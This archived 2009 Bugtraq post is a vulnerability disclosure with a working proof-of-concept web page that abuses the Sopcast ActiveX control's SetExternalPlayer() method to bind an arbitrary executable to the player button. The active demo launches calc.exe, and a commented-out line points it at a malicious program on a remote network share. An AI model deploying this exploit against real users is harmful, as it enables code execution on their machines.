lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 25 Feb 2009 22:56:19 -0700
From: nospam@...il.it
To: bugtraq@...urityfocus.com
Subject: Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
 user assisted remote code execution poc

<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
     user assisted remote code execution poc
     by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the "external player"
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
        ID="SopPlayer"
        name="SopPlayer"
        CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
        HEIGHT=375
        WIDTH=375>
</OBJECT>
</BODY>
</HTML>

original url: http://retrogod.altervista.org/9sg_sopcastia.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ